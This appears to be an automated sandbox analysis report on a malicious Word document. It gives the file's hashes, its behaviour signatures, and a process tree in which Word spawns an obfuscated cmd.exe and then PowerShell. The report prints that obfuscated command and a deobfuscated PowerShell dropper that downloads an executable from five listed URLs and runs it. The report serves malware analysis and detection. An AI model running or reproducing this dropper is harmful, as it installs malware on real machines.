Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-05-2024 17:11

General

  • Target

    72abbface4c8cea179df95e9717cfde4_JaffaCakes118.doc

  • Size

    203KB

  • MD5

    72abbface4c8cea179df95e9717cfde4

  • SHA1

    c358ec289edd6febf28edd2c518ba43055c78086

  • SHA256

    f349dcd66a084e8b9b503b274d9128d22931497b78675b8e8ab424977db22275

  • SHA512

    653bd8f5e4c9d57b39545a7372f3273dbf573ce064ed4c450628f53402738cade128fafc0f8c79f011072edf9e20f9da9bbf3271f42b977ebc129bb3229f86f0

  • SSDEEP

    3072:Xte2dw99fk3vIAWHWaaYuK5vE0B8FlgN2zU/Li0LZ:9Hdw7kwAWHWFK5TBmlgNfLFZ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://stalfond-n.ru/KDYGGWK

exe.dropper

http://skladvysotka.ru/tbf6tn5r

exe.dropper

http://tdov.ru/0KJ9f6g

exe.dropper

http://doop.pl/Q3XAEGW7

exe.dropper

http://tranz2000.net/del/4Wpsnr5sxD

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\72abbface4c8cea179df95e9717cfde4_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3772
    • C:\Windows\SYSTEM32\CMd.exe
      CMd /V/C"s^e^t +{^,^'=^519 ^93^1 ^35^1^ 1^53^ 1^59^ 1^09 ^093 ^1^05^ ^109 910 1^0^9^ ^301 ^3^01 13^9 ^35^1^ ^5^09 ^039 0^1^5}^5^03^}^13^5{5^31h^5^0^9c^319t5^9^0^a310c^309^}9^3^0^;10^5k903a^051^e905r^1^59^b^0^5^1^;13^0M^05^3^X^913^o0^15$^0^9^1 1^5^0^m035^e^015^t^9^01I9^03^-5^1^3^e1^30k^1^90o^3^9^5v^3^1^0n^9^0^3^I^593^;^150)^1^03M^5^3^9^X193^o^519^$5^0^3 5^3^0,^0^1^3^I5^1^9P^1^59P^1^59$3^19(^195^e^0^15l0^19i1^0^3^F9^0^3^d^1^5^9a91^0o^9^53l5^9^1n0^5^9w^53^9o159D^1^3^5.5^3^9Q^9^3^5C^31^0m^351$9^1^3^{310y3^0^1r^5^9^3^t310{^30^5)3^95P^193R5^09^L^593$^3^90^ 93^5n^0^19i1^0^3 5^13^I3^5^0P3^5^0^P^53^1^$105(^15^0^h903c^3^1^0a93^0e^53^9r039^o51^3^f^301^;3^1^0^'91^5e^190x0^1^5^e^1^30^.190'^50^9+^139^i019a^3^05^L^3^0^5^$^95^0+^01^5^'5^9^1\95^0'^395^+^53^0c9^1^5^i05^9^l^390^b^39^1u^09^5p^053^:531v^51^9n^3^0^5e1^05^$^9^0^1=095^M1^0^9X^3^1^5^o^9^50$^1^5^0^;^1^03'9^0^3^2^0^19^990^360^39^'^0^31 ^3^0^5^=^3^0^1 ^0^5^3^i^0^19^a^3^9^5^L0^1^5$0^3^9;3^10)^15^0'5^01@^39^5'^0^5^1(1^0^9t^1^53^i^3^59^l^9^51p^3^19S^0^3^1.^3^51'9^5^0D^159x0^9^3s13559^0^1r5^3^0n3^59^s^01^3p9^05W1^35^459^0/^503l^1^0^9e^31^9^d1^0^3/^1^3^5^t9^30e^0^35n0^1^3^.^5^03^0^305^0^90^10^19^323^05^z^5^91n^9^1^5a510r^35^9t^1^95/^0^39/9^0^1^:^10^9p0^9^3^t0^53t93^1h^5^0^3@51^3735^9W150G1^5^0E0^91^A^935X^053^3^9^1^0Q^95^1/^3^1^9l019^p9^5^0^.0^39^p^5^9^1^o50^9^o031d^3^1^0/1^59/^09^1:^91^5p510^t5^39t10^9h530^@^30^9^g93^1^690^1^f^03^59^90^5J0^1^9K91^500^1^5/^09^1u^19^3r^3^5^1.^9^01v^903^o390d^50^1t^01^9/^3^9^5/^0^5^1^:953p^903t^3^0^9^t509h^1^50^@9^0^1r^9^1^55^539n50^1^t^1^5^3^653^0f^0^9^3^b01^9t^39^5/^90^5u^059r93^1.0^53^a^1^35^k5^13^t^319o^0^15s3^5^0y^01^3v^30^5^d539^a30^5^l^01^3k^5^10s^5^0^3/^0^31/9^3^1^:0^31p^95^0^t^539^t53^1^h^5^13@^1^3^0^K^19^5^W0^1^5G1^0^3G^30^5^Y^3^15^D^5^9^1^K^5^3^1/19^0^u^0^9^3r^5^9^1.50^1n^190^-51^3^d^3^0^1n^3^0^5o1^05f3^5^1l^0^5^1^a5^9^0t9^35s^1^09/9^1^3/901:^0^39^p03^5t90^5^t90^1h^139^'^5^01^=^50^9P^9^50R91^0^L^35^1$1^50;^359t0^3^1n^35^1e03^9^i9^51^l3^91C9^0^3b^391e3^5^1^W^5^93^.3^1^0t0^91e15^9N^395 ^3^0^9t^93^0c190e^135j^13^0b^5^3^1^o^0^5^9^-310^w^5^3^0^e^3^9^0n35^0=0^9^3Q^19^3C03^9m^9^5^1^$1^03^ ^9^1^3l^1^93^l^3^50e^13^5^h^310^s^509r0^93^e^390^w^1^50^o0^93^p&&^f^or /^L %^Z ^in (^14^15^,^-4^,^3)^d^o se^t ^'^`^,=!^'^`^,!!+{^,^':~%^Z,1!&&^i^f %^Z=^=^3 c^al^l %^'^`^,:~^5%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $mCQ=new-object Net.WebClient;$LRP='http://stalfond-n.ru/KDYGGWK@http://skladvysotka.ru/tbf6tn5r@http://tdov.ru/0KJ9f6g@http://doop.pl/Q3XAEGW7@http://tranz2000.net/del/4Wpsnr5sxD'.Split('@');$Lai = '692';$oXM=$env:public+'\'+$Lai+'.exe';foreach($PPI in $LRP){try{$mCQ.DownloadFile($PPI, $oXM);Invoke-Item $oXM;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:944

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD7A3B.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_runuclkh.uns.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/944-46-0x00000177A78D0000-0x00000177A78F2000-memory.dmp

    Filesize

    136KB

  • memory/3772-24-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-3-0x00007FFD4156D000-0x00007FFD4156E000-memory.dmp

    Filesize

    4KB

  • memory/3772-28-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-6-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-7-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-8-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-10-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-9-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-11-0x00007FFCFF4A0000-0x00007FFCFF4B0000-memory.dmp

    Filesize

    64KB

  • memory/3772-12-0x00007FFCFF4A0000-0x00007FFCFF4B0000-memory.dmp

    Filesize

    64KB

  • memory/3772-23-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-27-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-26-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-2-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-564-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-5-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-4-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-1-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-58-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-230-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-0-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-511-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-510-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-512-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-522-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-562-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-561-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-560-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-563-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-29-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB